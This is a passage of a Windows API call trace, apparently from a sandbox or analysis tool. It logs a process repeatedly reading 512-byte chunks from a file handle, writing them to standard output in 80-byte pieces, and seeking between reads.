(_FileHandle=4) returned 0x58 [0236.214] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=4) returned 0x58 
[0236.215] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.215] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, 
lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.216] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.216] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 
0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.217] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.217] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) 
returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0236.218] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.219] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.220] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.220] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType 
(hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.221] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.221] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.221] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, 
lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, 
lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.222] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.222] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 